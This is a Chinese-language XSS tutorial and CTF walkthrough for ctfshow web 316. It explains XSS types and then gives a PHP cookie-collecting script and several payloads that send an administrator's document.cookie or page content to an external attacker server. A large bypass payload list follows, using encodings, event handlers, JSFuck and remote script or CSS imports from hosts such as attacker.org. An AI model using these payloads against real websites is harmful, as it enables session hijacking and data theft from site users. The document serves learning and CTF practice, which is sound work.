XSS的本质是一种高级钓鱼手法。
认识XSS
XSS (Cross Site Scripting) 攻击全称跨站脚本攻击,是为不和层叠样式表 (Cascading Style Sheets, CSS) 的缩写混淆,故将跨站脚本攻击缩写为 XSS。
XSS 是一种经常出现在 Web 应用中的计算机安全漏洞,它允许恶意 Web 用户将代码植入到提供给其它用户使用的页面中。
在XSS攻击中,一般有三个角色参与:攻击者、目标服务器、受害者的浏览器。
原理:将恶意的 script 脚本插入进 html/css/js 文件当中。

反射型XSS
反射型XSS,又称非持久型XSS。
之所以称为反射型XSS,是因为这种攻击方式的注入代码是从目标服务器通过错误信息、搜索结果等等方式“反射”回来的:发出请求时,XSS代码出现在URL中,作为输入提交到服务器端,服务器端解析后响应,XSS代码随响应内容一起传回给浏览器,最后浏览器解析执行XSS代码。这个过程像一次反射,故叫反射型XSS。
而称为非持久型XSS,则是因为这种攻击方式具有一次性,由于代码注入的是一个动态产生的页面而不是永久的页面,因此这种攻击方式只在点击链接的时候才产生作用。
特点:
① 不经过服务器存储,直接通过 HTTP 的 GET 和 POST 请求就能完成一次攻击,拿到用户隐私数据;
②攻击者需要诱骗点击;
③反馈率低,所以较难发现和响应修复;
④盗取用户敏感保密信息。
存储型XSS
存储型XSS,又称持久型XSS。
他和反射型XSS最大的不同就是,攻击脚本将被永久地存放在目标服务器端(数据库,内存,文件系统等),下次请求目标页面时不用再提交XSS代码。
一般存在于 Form 表单提交等交互功能,如发帖留言,提交文本信息等,多见于论坛。黑客利用的 XSS 漏洞,将内容经正常功能提交进入数据库持久保存,当前端页面获得后端从数据库中读出的注入代码时,恰好将其渲染执行。
特点:
①持久性,植入在数据库中;
②危害面广,甚至可以让用户机器变成 DDoS 攻击的肉鸡;
③ 盗取用户敏感私密信息。
DOM型XSS
DOM型XSS 是基于文档对象模型 Document Objeet Model,DOM)的一种漏洞。对于img,input等这种类型的 DOM 节点标签,DOM型XSS就可以利用其进行攻击
DOM 型 XSS 全部都是由前端进行触发的。
例题:ctfshow web入门 316

输入什么就返回什么,尝试执行js代码<script>alert(1)</script>

成功返回了弹窗
本题的flag在管理员的cookie中,机器人会定时自动点击生成的链接
创建一个自动接收脚本a.php在vps上
1 2 3 4 5 6
| <?php $cookie = $_GET['cookie']; $log = fopen("cookie.txt", "a"); fwrite($log, $cookie . "\n"); fclose($log); ?>
|
生成Xss代码链接,用于获取管理员cookie
<body/**/onload="window.open('http://ip:port/index.php/?1='+document.cookie)"></body>
<body/**/onload="window.location.href='http://ip:port/index.php/?1='+document.cookie"></body>
<script>window.open("http://149.88.83.236:8000/a.php/?1="+document.cookie)</script>
python3 -m http.server监听即可拿到cookie

1
| <script>window.open('http://149.88.83.236:8000/a.php'+document.getElementsByClassName('layui-table-cell laytable-cell-1-0-1')[1].innerHTML)</script>
|
片段 |
说明 |
window.open(url) |
在新窗口打开一个 URL(或发起 GET 请求) |
'http://149.88.83.236:8000/a.php' |
攻击者自己的服务器(用于收集数据) |
document.getElementsByClassName(...)[1] |
获取页面中 class 为 layui-table-cell laytable-cell-1-0-1 的第 2 个元素 |
.innerHTML |
提取该元素的 HTML 内容,可能是 flag 或敏感数据 |
拼接成完整 URL |
将敏感信息拼接到 URL 参数中传回给攻击者 |
1
| <script>$('.layui-table-cell').each(function(index,value){{if(value.innerHTML.indexOf('ctfshow') > -1){window.open("http://149.88.83.236:8000/a.php/?1="+value.innerHTML);}}})</script>
|
- 遍历所有
.layui-table-cell
元素
- 判断其
innerHTML
是否包含 'ctfshow'
( flag 的前缀)
- 一旦匹配,就使用
window.open()
打开新窗口并带走 flag 内容
bypass
常规使用<script>alert(1)</script>
其次可以使用img
body
input
在 IMG 标签中,当给定的图片 URL 地址存在且图片加载完成,则触发onload事件。当给定的图片 URL 地址不存在或网络出错时,则触发onerror事件。
- 如果()被过滤,可以用
//
和``
替代
- 如果空格被过滤,可以用
/**/
绕过
- 如果<>被过滤,可以用
%3c
和%3e
替代
- 如果引号被过滤,可以用
%27
或%22
替代
payload集合
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151
| #第一类:Javascript URL <a href="javascript:alert('test')">link</a> <a href="javascript:alert('xss')">link</a> <a href='vbscript:MsgBox("XSS")'>link</a> <a href="vbscript:alert(1)">Hello</a> <a href="vbscript:alert(1)">Hello</a> <a href=javascript:alert("XSS")>link</a> <a href=`javascript:alert("RSnake says,'XSS'")`>link</a> <a href=javascript:alert(String.fromCharCode(88,83,83))>link</a> <a href="javascript:alert(1)">link</a> <a href="javaSCRIPT:alert(1)">Hello</a> <a href="javasc
ript:alert(1)">link</a> <a href="javas	cript:\u0061lert(1);">Hello</a> <a href="jav ascript:alert('XSS')">link</a> <a href="jav	ascript:alert('XSS')">link</a> <a href="jav
ascript:alert('XSS')">link</a> <a href=" javascript:alert('XSS');">link</a> <a href="javascript:\u0061lert(1)">Hello</a> <a href="javascript:confirm`1`">link</a> <a href="javascript:confirm(1)">link</a> <a href="j	a	vas	c	r	ipt:alert(1)">1</a> <a href="javascript:%61%6c%65%72%74%28%31%29">link</a> <a href="javascript:\u0061\u006C\u0065\u0072\u0074(1)">link</a> <a href=javascript:eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")>2</a> <a href=javascript:eval("alert('xss')")>link</a> <a href=javascript:alert('XSS')>link</a> <a href=javascript:alert('XSS')>link</a> <a href=javascript:alert('XSS')>link</a> <a href="data:text/html;base64,amF2YXNjcmlwdDphbGVydCgxKQ==">test</a> <a href=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+>1</a> <iframe/src="data:text/html;	base64
,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> #第二类:CSS import <style>@import url("http://attacker.org/malicious.css");</style> <style>@imp\ort url("http://attacker.org/malicious.css");</style> <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> <STYLE>@import'http://jb51.net/xss.css';</STYLE> #第三类:Inline style <div style="color: expression(alert('XSS'))"> <div style=color:expression\(alert(1))></div> <div style="color: '<'; color: expression(alert('XSS'))"> <div style=X:expression(alert(/xss/))> <div style="x:\65\78\70\72\65\73\73\69\6f\6e(alert(1))"> <div style="x:\000065\000078\000070\000072\000065\000073\000073\000069\00006f\00006e(alert(1))"> <div style="x:\65\78\70\72\65\73\73\69\6f\6e\028 alert \028 1 \029 \029"> <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> <div style="z:exp/*anything*/res/*here*/sion(alert(1))"> <div style=xss:expr/*XSS*/ession(alert('XSS'))> </XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> </XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.baidu.com")> <img STYLE="background-image:url(javascript:alert('XSS'))"> //ie6 <img STYLE="background-image:\75\72\6c\28\6a\61\76\61\73\63\72\69\70\74\3a\61\6c\65\72\74\28\27\58\53\53\27\29\29"> <A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
#第四类:JavaScript 事件 <div onclick="alert('xss')"> <div onmouseenter="alert('xss')"> <div onclick ="alert('xss')"> <BODY ONLOAD=alert('XSS')> <img src=1 onerror=alert(1)> <img/src='1'/onerror=alert(0)> <img src="1" onerror="alert(1)" /> <img src=1 alt=al lang=ert onerror=top[alt+lang](0)> <img src="1" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img> <img src=1 onmouseover=alert('xss') a1=1111> <img src=x onerror=s=createElement('script');body.appendChild(s);s.src='http://t.cn/R5UpyOt';> <a href="#" onclick=alert('\170\163\163')>test</a> <a href="#" onclick="\u0061\u006C\u0065\u0072\u0074(1)">link</a> <a href="#" onclick="\u0061\u006C\u0065\u0072\u0074`a`">link</a> <a href="#" onclick="alert('xss')">link</a> <marquee onscroll=alert(1)> test</marquee> <div style="width:100px;height:100px;overflow:scroll" onscroll="alert('a')">123456 <br/><br/><br/><br/><br/></div> <DIV onmousewheel="alert('a')" >123456</DIV><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/> <div style="background-color:red" onmouseenter="alert('a')">123456</div> <DIV onmouseleave="alert('1')">123456</DIV> <div contentEditable="true" style="background-color:red" onfocusin="alert('a')" >asdf</div> <div contentEditable="true" style="background-color:red" onfocusout="alert('bem')" >asdf</div> <marquee onstart="alert('a')" >asdf</marquee> <div style="background-color:red;" onbeforecopy="alert('a')" >asdf</div> <div style="background-color:red;" onbeforecut="alert('a')" >asdf</div> <div style="background-color:red;" contentEditable="true" onbeforeeditfocus="alert('a')" >asdf</div> <div style="background-color:red;" ="true" onbeforepaste="alert('a')" >asdf</div> <div style="background-color:red;" oncontextmenu="alert('a')" >asdf</div> <div style="background-color:red;" oncopy="alert('a')" >asdf</div> <div contentEditable="true" style="background-color:red;" oncut="alert('a')" >asdf</div> <div style="background-color:red;" ondrag="alert('1')" >asdf</div> <div style="background-color:red;" ondragend="alert('a')" >asdf</div> <div style="background-color:red;" ondragenter="alert('b')" >asdf</div> <div contentEditable="true" style="background-color:red;" ondragleave="alert('a')" >asdf</div> <div contentEditable="true" style="background-color:red;" ondragover="alert('b')" >asdf</div> <div contentEditable="true" style="background-color:red;" ondragstart="alert('a')" >asdf</div> <div contentEditable="true" style="background-color:red;" ondrop="alert('b')" >asdf</div> <div contentEditable="true" style="background-color:green;" ondrop="alert('bem')" >asdf</div> <div contentEditable="true" style="background-color:red;" onlosecapture="alert('b')">asdf</div> <div contentEditable="true" style="background-color:red;" onpaste="alert('a')" >asdf</div> <div contentEditable="true" style="background-color:red;" onselectstart="alert('a')" >asdf</div> <div contentEditable="true" style="background-color:red;" onhelp="alert('a')" >asdf</div> <div STYLE="background-color:red;behavior:url('#default#time2')" onEnd="alert('a')">asdf</div> <div STYLE="background-color:red;behavior:url('#default#time2')" onBegin="alert('a')">asdf</div> <div contentEditable="true" STYLE="background-color:red;" onactivate="alert('b')">asdf</div> <div contentEditable="true" STYLE="background-color:red;filter: Alpha(opacity=100, style=2);"onfilterchange="alert('b')">asdf</div> <div contentEditable="true" onbeforeactivate="alert('b')">asdf</div> <div contentEditable="true" onbeforedeactivate="alert('a')">asdf</div> <div contentEditable="true" ondeactivate="alert('bem')">asdf</div> <video src="http://www.w3schools.com/html5/movie.ogg" onloadedmetadata="alert(1)" /> <video src="http://www.w3schools.com/html5/movie.ogg" onloadstart="alert(1)" /> <audio src="http://www.w3schools.com/html5/movie.ogg" onloadstart="alert(1)"> <audio src="http://www.w3schools.com/html5/movie.ogg" onloadstart="alert(1)"></audio> <body onscroll=alert(26)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br> <input type="hidden" accesskey="X" onclick="alert(/xss/)">
#第五类:Script 标签 <script src="http://baidu.com"></script><script>Function(atob('YWxlcnQoInhzcyIp'))()</script> <script>alert("XSS")</script> <scr<script>ipt>alert("XSS")</scr<script>ipt> <SCRIPT>a=/XSS/ alert(a.source)</SCRIPT> <script>alert(/1/.source)</script> <script>alert(1);</script> <script>prompt(1);</script> <script>confirm(1);</script> <script>alert(/88199/)</script> <script>alert(`a`)</script> <script>alert('a')</script> <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> <script>eval(alert(1))</script> <script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 50, 51, 41))</script> <script>eval("\u0061\u006c\u0065\u0072\u0074\u0028\u0022\u0078\u0073\u0073\u0022\u0029")</script> <script>eval('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')</script> <script>setTimeout('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')</script> <script>setTimeout(alert(1),0)</script> <script>setTimeout`alert\x28\x27 xss \x27\x29`</script> <script>setInterval('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')</script>
<script src=data:text/javascript,alert(1)></script> <script src=data:text/javascript,alert(1)></script>
<script>\u0061\u006C\u0065\u0072\u0074(123)</script> <script>\u0061\u006C\u0065\u0072\u0074(1)</script> <script>\u0061\u006C\u0065\u0072\u0074`a`</script> <script>window['alert'](0)</script> <script>parent['alert'](1)</script> <script>self['alert'](2)</script> <script>top['alert'](3)</script>
<script>alert("xss");;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;</script> <script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())();</script> <script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script>
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135
| 1、onmouseenter:当鼠标进入选区执行代码 <div style="123456</div>
2、onmouseleave:当鼠标离开选区执行代码 <DIV onmouseleave="alert('bem')" style="123456</DIV>
3、onmousewheel:当鼠标在选区滚轮时执行代码 <DIV onmousewheel="alert('bem')" style="123456</DIV>
4、onscroll:拖动滚动条执行代码 <div style="width:100px;height:100px;overflow:scroll" onscroll="alert('bem')">123456 </div>
5、onfocusin:当获得焦点时执行代码 <div contentEditable="true" style="asdf</div>
6、onfocusout:当失去焦点时执行代码 <div contentEditable="true" style="asdf</div>
7、onstart:当显示内容时执行代码 <marquee style="background-color:red" onstart="alert('bem')" >asdf</marquee>
8、onbeforecopy:选中内容后右键执行代码 <div style="" onbeforecopy="alert('bem')" >asdf</div>
9、onbeforecut:选中内容后右键执行代码 <div style="" onbeforecut="alert('bem')" >asdf</div>
10、onbeforeeditfocus:当获得焦点时执行代码 <div style="" contentEditable="true" onbeforeeditfocus="alert('bem')" >asdf</div>
11、onbeforepaste:选中内容后右键执行代码 <div style="" ="true" onbeforepaste="alert('bem')" >asdf</div>
12、oncontextmenu:鼠标右键执行代码 <div style="" oncontextmenu="alert('bem')" >asdf</div>
13、oncopy:鼠标右键执行复制时执行代码 <div style="" oncopy="alert('bem')" >asdf</div>
14、oncut:鼠标右键执行剪切时执行代码 <div contentEditable="true" style="" oncut="alert('bem')" >asdf</div>
15、ondrag:选择内容并拖动时执行代码 <div style="" ondrag="alert('bem')" >asdf</div>
16、ondragend:选择内容并拖动松开鼠标执行代码 <div style="" ondragend="alert('bem')" >asdf</div>
17、ondragenter:选择内容并拖动时执行代码 <div style="" ondragenter="alert('bem')" >asdf</div>
18、ondragleave:选择内容并拖出边框执行代码 <div contentEditable="true" style="" ondragleave="alert('bem')" >asdf</div>
19、ondragover:选择内容并拖动时执行代码 <div contentEditable="true" style="" ondragover="alert('bem')" >asdf</div>
20、ondragstart:选择内容并拖动时执行代码 <div contentEditable="true" style="" ondragstart="alert('bem')" >asdf</div>
21、ondrop:有内容被拖动进来时执行代码 <div contentEditable="true" style="" ondrop="alert('bem')" >asdf</div> <div contentEditable="true" style="" ondrop="alert('bem')" >asdf</div>
22、onlosecapture:选择内容时执行代码 <div contentEditable="true" style="" onlosecapture="alert('bem')" >asdf</div>
23、onpaste:粘贴时执行代码 <div contentEditable="true" style="" onpaste="alert('bem')" >asdf</div>
24、onselectstart:选择内容时执行代码 <div contentEditable="true" style="" onselectstart="alert('bem')" >asdf</div>
25、onhelp:进入焦点按F1时执行代码 <div contentEditable="true" style="" onhelp="alert('bem')" >asdf</div>
26、onEnd:当时间线执行完毕时执行代码 <div STYLE="behavior:url('#default#time2')" onEnd="alert('bem')">asdf</div>
27、onBegin:当时间线开始执行代码 <div STYLE="behavior:url('#default#time2')" onBegin="alert('bem')">asdf</div>
28、onactivate:激活当前标签时执行代码 <div contentEditable="true" STYLE="" onactivate="alert('bem')">asdf</div>
29、onfilterchange:当滤镜改变时执行代码 <div contentEditable="true" STYLE="filter: Alpha(opacity=100, style=2);" onfilterchange="alert('bem')">asdf</div>
30、onbeforeactivate:当激活当前标签时执行代码 <div contentEditable="true" STYLE="" onbeforeactivate="alert('bem')">asdf</div>
31、onbeforedeactivate:当标签内值改变时执行代码 <div contentEditable="true" STYLE="" onbeforedeactivate="alert('bem')">asdf</div>
32、ondeactivate:当标签内值改变时执行代码 <div contentEditable="true" STYLE="" ondeactivate="alert('bem')">asdf</div>
<a>标签 <a href=javascript:alert(1)>111</a>
<img>标签 <img src=https://www.baidu.com/img/flexible/logo/pc/result.png> <img src=x onerror=alert('XSS')// <img src=x onerror=alert(String.fromCharCode(88,83,83));> <img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));> <img src=x:alert(alt) onerror=eval(src) alt=xss>
<input>标签 <input onmouseover=alert(1) />
<script>标签 <script>alert('XSS')</script> <scr<script>ipt>alert('XSS')</scr<script>ipt> "><script>alert('XSS')</script>
alert被过滤,可以prompt、confirm、console.log替换使用: 如果都被过滤,可以换个方式绕过
onmouseover=top[11189117..toString(32)](2222) onmouseover=top[11189117..toString(32)](2222) onmouseover="setTimeout(String.fromCharCode(97,108,101,114,116,40,49,41))"
onmousemove=top[11189117..toString(32)](2222) onmouseover=top[11189117..toString(32)](2222) onclick=……………………等等 onmousemove='alert(1111)'a=" <script>top[11189117..toString(32)](2222)</script> <ScRiPt>top[11189117..toString(32)](2222)</ScRiPt> %3cscript%3ealert(1111)%3c/script%3e <Script>\u0061\u006C\u0065\u0072\u0074(1111)</Script>
<img src=java\0script:alert`1111`> <img src=x onerror=alert`1111`> %3Cimg+src%3Dx+onerror%3Dtop[11189117..toString(32)]%601111%60%3E
|
参考:
从0到1完全掌握 XSS
web攻防之XSS攻击详解——XSS简介与类型
XSS payload 大全 - Bypass - 博客园